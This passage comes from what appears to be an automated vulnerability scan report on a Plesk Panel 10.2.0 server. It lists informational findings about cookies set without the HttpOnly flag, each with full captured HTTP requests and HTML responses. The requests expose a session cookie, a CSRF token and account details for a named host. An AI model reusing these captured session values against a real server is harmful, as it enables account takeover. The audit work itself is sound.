items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Limit Bandwidth Usage and Number of Allowed Connections to Your Website</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/dom_performance_readonly/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function update_oC(f)
       {
           if (!check_oC(f)) {
               alert("Improper value.");
               return false;
           }

           f.cmd.value="update";
           lsubmit(f);

           return false;
       }

       function check_oC(f)
       {
           if (f.bandwidth_enabled.checked && !chk_pos_int(f.bandwidth.value)) {
               f.bandwidth.select();
               f.bandwidth.focus();
               return false;
           }
           if (f.max_connections_enabled.checked && !chk_pos_int(f.max_connections.value)) {
               f.max_connections.select();
               f.max_connections.focus();
               return false;
           }
           return true;
       }

       function change_oC(o1, o2)
       {
           o2.disabled = !o1.checked;
           if (!o2.disabled) {
               o2.select();
               o2.focus();
           }
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/performance/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   

<fieldset>
   <legend>Bandwidth limiting</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">

       <tr >
           <td class="name"><label for="fid-bandwidth">Maximum bandwidth usage (KB/s)</label></td>
           <td>Unlimited</td>
       </tr>

</table>

</td></tr></table></fieldset>

<fieldset>
   <legend>Connections limiting</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">

       <tr>
           <td class="name"><label for="fid-max_connections">Connections limited to</label></td>
           <td>Unlimited</td>
       </tr>
   </table>

</td></tr></table></fieldset>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.31. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/odbc/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:21 GMT
Connection: close
Content-Length: 15313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fdomain-alias%2540%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fdomain-aliases%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>ODBC DSN</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_dsn_configuration/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">

<fieldset>

   <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
   
   <div class="screenButtons">
       <DIV class="commonButton" id="bid-odbc-dsn-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add ODBC data source.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/dsn@new/properties/&#039;); return false;" style=""><BUTTON name="bname_odbc_dsn_add" id="buttonid-odbc-dsn-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/dsn@new/properties/&#039;); return false;">Add New ODBC DSN</BUTTON><SPAN id="spanid-odbc-dsn-add">Add New ODBC DSN</SPAN></DIV>
   </div>
   
</td></tr></table></fieldset>

</div>

<div class="listArea">

<fieldset>

<legend>ODBC DSN connections</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<div class="paging pagingTop noList">No ODBC DSN connections</div><div class="paging pagingBottom noList"></div><script>SetCookie("dsnlist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function DsnListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DsnListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DsnListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DsnListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DsnListSelectAll.checked;
                           DsnListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DsnListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DsnListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DsnListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   DsnListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DsnListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DsnListSearchShow()
           {
               var sc = document.getElementById("DsnListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DsnListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DsnListSearchHide()
           {
               var sc = document.getElementById("DsnListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DsnListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DsnListRemove(f)
           {
               if (0 == DsnListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/odbc/";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.32. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:09:15 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:09:15 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
